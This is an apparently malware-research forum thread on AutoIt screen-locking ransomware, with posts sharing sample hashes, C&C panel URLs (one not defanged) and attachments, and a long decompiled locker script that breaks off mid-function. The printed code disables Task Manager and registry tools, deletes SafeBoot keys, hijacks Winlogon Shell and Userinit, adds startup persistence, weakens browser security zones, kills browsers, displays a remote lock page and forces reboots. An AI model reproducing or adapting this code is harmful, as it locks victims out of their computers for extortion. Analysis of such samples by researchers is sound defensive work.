AutoIt/LockScreen

Re: Trojan Ransom / FakePoliceAlert

#16588 by EP_X0FF
Tue Nov 13, 2012 7:13 am

thisisu wrote:Full decompile in attach

~99% of this is just AutoIt runtime.

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: Trojan Ransom / FakePoliceAlert

#16599 by wacked2
Tue Nov 13, 2012 8:21 pm

thisisu wrote:...

Code: Select all

	$HAFTBEFEHLAAT = "haftbefehlaat"
...[/quote]
https://www.youtube.com/watch?v=vmX6OuVjWpA
No surprise that the coder of a autoit winlocker listens to that crap.

Username

wacked2

Posts

19

Joined

Sat Dec 17, 2011 3:25 pm

#21055 by patriq
Thu Oct 03, 2013 7:19 pm

Sorry if this is not the right place to post, I searched the forum for this topic but only found a completed malware request..

Picked this up from exposedbotnets - attached sample

2fc103d0d52466b63d44444ce12a5901

lock display, new landing page for any country:
hxxp://213.133.111.10/panel/landing/FR.php

directory listing allowed - browse the landing pages:
hxxp://213.133.111.10/panel/landing/

and the C&C admin panel
http://213.133.111.10/panel/index.php

Attachments

test1.exe.zip

infected
(390.33 KiB) Downloaded 76 times

Username

patriq

Posts

109

Joined

Fri Jun 28, 2013 8:11 pm

Re: AutoIt/LockScreen

#21062 by EP_X0FF
Fri Oct 04, 2013 3:08 am

AutoIt locker.

Most below is runtime, actual malware code closer to the end.

Attachments

script.rar

pass: malware
(49.94 KiB) Downloaded 82 times

Ring0 - the source of inspiration

Username

EP_X0FF

Rank

Global Moderator

Posts

4947

Joined

Sun Mar 07, 2010 5:35 am

Location

Russian Federation

Contact

Re: AutoIt/LockScreen

#22058 by hx1997
Mon Jan 27, 2014 12:30 pm

https://www.virustotal.com/en/file/d121 ... 390825413/
GData Win32.Trojan-Ransom.Malautoit.B

Attachments

28429BA4AF2FF85E4E5E4F915D76BAE3.7z

infected
(577.28 KiB) Downloaded 76 times

Username

hx1997

Posts

101

Joined

Sat Apr 07, 2012 12:16 am

Re: AutoIt/LockScreen

#22063 by EP_X0FF
Tue Jan 28, 2014 3:35 am

hx1997 wrote:https://www.virustotal.com/en/file/d121 ... 390825413/
GData Win32.Trojan-Ransom.Malautoit.B

Panel located at hxxp://obession.co.ua/panel2/landing/gate.php, hxxp://obession.co.ua/panel2/landing/ is open directory.

Fun trash script hxxp://obession.co.ua/reboot/index.html

Locker internals.

Code: Select all

$a6319525d60 = "aaabauernscheisseoki"
$a0719724408 = "aaabauernscheisseoki"
Opt("WinWaitDelay", 0x00000064)
$a4c19b20f54 = "aaabauernscheisseoki"
Opt("WinDetectHiddenText", 1)
$a1019f20a5d = "aaabauernscheisseoki"
Opt("MouseCoordMode", 0)
$a4029322b5a = "aaabauernscheisseoki"
If NOT FileExists(@StartupDir & "\" & "ja" & ".lnk") Then
	$a1d29925210 = "aaabauernscheisseoki"
	If @Var1197Version = "WIN_XP" Then
		$a2b29d24543 = "aaabauernscheisseoki"
		RegDelete("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot")
		$a1d39025538 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a593962365e = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a1939c23e34 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a3549225f54 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a0949820555 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a1249e24b34 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a0c5942022c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a3759a2561b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a506902215b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a3969624160 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a5869c24a41 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "2500", "REG_DWORD", "3")
		$a4279222a25 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "2500", "REG_DWORD", "3")
		$a417982001e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "2500", "REG_DWORD", "3")
		$a2479e22363 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "2500", "REG_DWORD", "3")
		$a5a89425045 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\2", "2500", "REG_DWORD", "3")
		$a2089a20631 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\2", "2500", "REG_DWORD", "3")
		$a5399020330 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "2500", "REG_DWORD", "3")
		$a2699622160 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "2500", "REG_DWORD", "3")
		$a3299c26325 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\4", "2500", "REG_DWORD", "3")
		$a22a9222023 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\4", "2500", "REG_DWORD", "3")
		$a63a9821d2b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Internet Explorer\Main", "NoProtectedModeBanner", "REG_DWORD", "1")
		$a32a9e2202b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Internet Explorer\Main", "NoProtectedModeBanner", "REG_DWORD", "1")
		$a05b9424025 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "1609", "REG_DWORD", "0")
		$a5db9a24e01 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "1609", "REG_DWORD", "0")
		$a1fc9022309 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "1609", "REG_DWORD", "0")
		$a14c962115d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "1609", "REG_DWORD", "0")
		$a55c9c22721 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\2", "1609", "REG_DWORD", "0")
		$a62d9220e1d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\2", "1609", "REG_DWORD", "0")
		$a20d9821b0f = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "1609", "REG_DWORD", "0")
		$a00d9e24350 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "1609", "REG_DWORD", "0")
		$a26e9424c3b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\4", "1609", "REG_DWORD", "0")
		$a43e9a23c35 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\4", "1609", "REG_DWORD", "0")
		$a4af9021d3c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
		$a3ff962192f = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
		$a03f9c24942 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
		$a560a223544 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
		$a500a820108 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Explorer\Advanced", "HideIcons", "REG_DWORD", "01000000")
		$a600ae20840 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Explorer\Advanced", "HideIcons", "REG_DWORD", "01000000")
		$a071a422d32 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "1400", "REG_DWORD", "0")
		$a261aa22f0c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "1400", "REG_DWORD", "0")
		$a282a022d2c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "1400", "REG_DWORD", "0")
		$a132a622e32 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "1400", "REG_DWORD", "0")
		$a4a2ac2494c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "1400", "REG_DWORD", "0")
		$a373a224911 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "1400", "REG_DWORD", "0")
		$a233a820e35 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoDesktop", "REG_DWORD", "1")
		$a393ae21942 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoDesktop", "REG_DWORD", "1")
		$a2c4a421f1c = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_SZ", ".exe")
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_DWORD", ".exe")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_SZ", ".exe")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_DWORD", ".exe")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & "ja" & ".lnk")
		ProcessClVar1197e("iexplore.exe")
		ProcessClVar1197e("firefox.exe")
		Local $Var1189 = Fn0382()
		$a437ae2143f = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $Var0614 + $Var0630, $Var0634 + $Var0631 + $Var0630)
		GUISetBkColor(0x00ffffff)
		GUICtrlCreateObj($Var1189, (@DesktopWidth - 0x0000040b) / 2, (@DesktopHeight - 0x000002bc) / 2, 0x0000044c, 0x000002ee)
		GUISetState()
		Fn0203($a437ae2143f, 15, 0x000000ff, 3)
		Fn0383($Var1189, "obession.co.ua/reboot/index.html", 1)
		WinSetOnTop($a437ae2143f, "", 1)
		WinActivate($a437ae2143f)
		Sleep(0x00002af8)
		Shutdown(6)
		$a4d9a422e45 = "aaabauernscheisseoki"
		Sleep(0x000186a0)
		$a319a722626 = "aaabauernscheisseoki"
	Else
		$a1c9a922957 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MicrVar1197oft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
		$a079af21917 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\MicrVar1197oft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
		$a22aa52382c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\MicrVar1197oft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
		$a04aab2245e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\MicrVar1197oft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
		$a3fba122a37 = "aaabauernscheisseoki"
		$a48ba325449 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a5dba923958 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a37baf25645 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a09ca522353 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a61cab20032 = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a3eda125d5b = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a49da724554 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a1bdad22142 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
		$a2cea324a44 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a17ea925f1e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\Policies\MicrVar1197oft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
		$a48eaf2202e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "2500", "REG_DWORD", "3")
		$a5efa525828 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "2500", "REG_DWORD", "3")
		$a07fab20803 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "2500", "REG_DWORD", "3")
		$a210b121863 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "2500", "REG_DWORD", "3")
		$a5d0b721d08 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\2", "2500", "REG_DWORD", "3")
		$a030bd21740 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\2", "2500", "REG_DWORD", "3")
		$a491b321836 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "2500", "REG_DWORD", "3")
		$a391b92255b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "2500", "REG_DWORD", "3")
		$a131bf25708 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\4", "2500", "REG_DWORD", "3")
		$a0e2b522756 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\4", "2500", "REG_DWORD", "3")
		$a412bb22c58 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Internet Explorer\Main", "NoProtectedModeBanner", "REG_DWORD", "1")
		$a0f3b125108 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Internet Explorer\Main", "NoProtectedModeBanner", "REG_DWORD", "1")
		$a583b72472c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "1609", "REG_DWORD", "0")
		$a573bd24e30 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "1609", "REG_DWORD", "0")
		$a384b32413c = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "1609", "REG_DWORD", "0")
		$a034b922008 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "1609", "REG_DWORD", "0")
		$a014bf2434b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\2", "1609", "REG_DWORD", "0")
		$a0e5b521b4d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\2", "1609", "REG_DWORD", "0")
		$a595bb2583e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "1609", "REG_DWORD", "0")
		$a586b120903 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "1609", "REG_DWORD", "0")
		$a5c6b725311 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\4", "1609", "REG_DWORD", "0")
		$a3a6bd20463 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\4", "1609", "REG_DWORD", "0")
		$a2d7b323809 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
		$a207b923a27 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
		$a277bf2022e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
		$a558b520f5e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
		$a408bb2540d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ", @ScriptFullPath)
		$a2f9b12255d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ", @ScriptFullPath)
		$a009b725e1e = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Explorer\Advanced", "HideIcons", "REG_DWORD", "01000000")
		$a1c9bd2131d = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Explorer\Advanced", "HideIcons", "REG_DWORD", "01000000")
		$a38ab32260b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "1400", "REG_DWORD", "0")
		$a03ab925c1b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\0", "1400", "REG_DWORD", "0")
		$a3fabf2164b = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "1400", "REG_DWORD", "0")
		$a15bb523861 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\1", "1400", "REG_DWORD", "0")
		$a43bbb21816 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "1400", "REG_DWORD", "0")
		$a40cb121730 = "aaabauernscheisseoki"
		RegWrite("HKEY_CURRENT_USER64\Software\MicrVar1197oft\Windows\CurrentVersion\Internet Settings\Zones\3", "1400", "REG_DWORD", "0")
		$a5acb72362a = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoDesktop", "REG_DWORD", "1")
		$a20cbd2185e = "aaabauernscheisseoki"
		RegWrite("HKEY_LOCAL_MACHINE64\Software\MicrVar1197oft\Windows\CurrentVersion\Policies\Explorer", "NoDesktop", "REG_DWORD", "1")
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_SZ", ".exe")
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_DWORD", ".exe")
		RegWrite("HKEY_CURRENT_USER\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_SZ", ".exe")
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "DefaultFileTypeRisk", "REG_DWORD", "00001807")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "LowRiskFileTypes", "REG_DWORD", ".exe")
		RegWrite("HKEY_CURRENT_USER64\SOFTWARE\MicrVar1197oft\Windows\CurrentVersion\Policies\Associations", "ModRiskFileTypes", "REG_SZ", ".doc;.pdf;.xls;.exe")
		$a280c325020 = "aaabauernscheisseoki"
		FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & "ja" & ".lnk")
		FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & "ja" & ".lnk")
		ProcessClVar1197e("iexplore.exe")
		ProcessClVar1197e("firefox.exe")
		Local $Var1190 = Fn0382()
		$a341c222756 = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $Var0614 + $Var0630, $Var0634 + $Var0631 + $Var0630)
		GUISetBkColor(0x00ffffff)
		GUICtrlCreateObj($Var1190, (@DesktopWidth - 0x0000040b) / 2, (@DesktopHeight - 0x000002bc) / 2, 0x0000044c, 0x000002ee)
		GUISetState()
		Fn0203($a341c222756, 15, 0x000000ff, 3)
		Fn0383($Var1190, "obession.co.ua/reboot/index.html", 1)
		WinSetOnTop($a341c222756, "", 1)
		WinActivate($a341c222756)
		Sleep(0x00002af8)
		Shutdown(6)
		$a342c82253f = "aaabauernscheisseoki"
		Sleep(0x000186a0)
		$a222cb24a27 = "aaabauernscheisseoki"
	EndIf
EndIf
$a082cd2280c = "aaabauernscheisseoki"
$a432cf23f0e = "aaabauernscheisseoki"
$a0e3c122755 = Fn0447()

Func Fn0447()
	$a363c222d50 = StringLeft(@SystemDir, 3)
